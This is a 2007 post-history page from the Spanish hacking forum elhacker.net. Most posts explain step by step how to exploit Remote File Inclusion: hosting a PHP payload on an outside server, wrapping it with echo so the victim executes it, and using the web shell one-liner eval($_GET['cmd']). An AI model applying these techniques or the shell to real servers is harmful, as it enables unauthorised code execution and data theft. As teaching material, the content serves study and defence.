elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 42
71  Programación / Programación Visual Basic / Re: On Error GoTo NEXT en: 22 Agosto 2007, 23:01 pm
Código
  1. On Error Resume Next
72  Seguridad Informática / Nivel Web / Re: [?] File include en: 21 Agosto 2007, 00:09 am
Nunca hay que fiarse al 100% de los escáneres, y menos los que van dirigidos a las aplicaciones Web. Si queréis comprobar si son realmente vulnerables hagan las pruebas ustedes mismos asignándo a la variable una URL; si se carga la página Web o se produce un error, posiblemente es vulnerable.
73  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 21:27 pm
Cita de: archivo.txt
<?php
eval($_GET['cmd']);
?>

Revisa los temas anteriores, ya se ha hablado bastante sobre este fallo.
74  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 20:38 pm
WannaBeHacker, el archivo puede ser n_config.txt, archivo.php o file.html, lo importante es el contenido que contenga el archivo.

Un documento de texto o una página web (html) es lo más directo, porque tan solo tendremos que colocar el código a ejecutar, ya que es texto plano. En cambio si es un archivo PHP tendremos que imprimir como texto el código a incluir, por ejemplo, si archivo.php contiene:

Código
  1. <?php phpinfo(); ?>

Obtendremos como resultado la información de nuestro servidor, ya que
estaremos ejecutado phpinfo y el resultado de nuestro servidor será incluido en el servidor vulnerable, por lo tanto no estaremos ejecutando nada en dicho servidor.

En cambio el siguiente código imprime por pantalla <?php phpinfo(); ?>, que es lo que el servidor vulnerable incluirá mediante la función include/require:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

Rienzi, las shells, que en realidad no lo son tanto, poseen diversas funciones que nos simplicaran el trabajo, no es necesario que las utilices, puedes crear la tuya, o simplemente ejecutar códigos directos en el servidor si no quieres complicaciones.
75  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 17:43 pm
Citar
76  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 16:54 pm
Ejecutar cualquier código PHP en el servidor, o lo que es lo mismo, leer el código fuente de los archivos, poder establecer una conexión con la base de datos, crear/editar/eliminar archivos, etcétera.
77  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 14:55 pm
En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código
  1. <?php
  2. echo "<?php phpinfo(); ?>";
  3. ?>

En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código
  1. <?php phpinfo(); ?>
78  Seguridad Informática / Nivel Web / Re: [?] File include en: 20 Agosto 2007, 14:22 pm
Se supone que www.victima.com es el servidor vulnerable al Remote File Inclusion y no tú.

PD: Date una vuelta por Google.
79  Programación / PHP / Re: Duración de sesiones en: 20 Agosto 2007, 13:48 pm
Cita de: php.ini
session.gc_maxlifetime = 1440; Indica el número de segundos que deben haber pasado desde la última actualización para que se considere basura.
80  Programación / PHP / Re: Envio de email en: 18 Agosto 2007, 16:35 pm
Entre comillas...

Código
  1.  
  2. [...]
  3.  
  4. if (mail("maties_6@hotmail.com", $asunto, $cuerpo)) {
  5.  
  6. [...]
  7.  
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines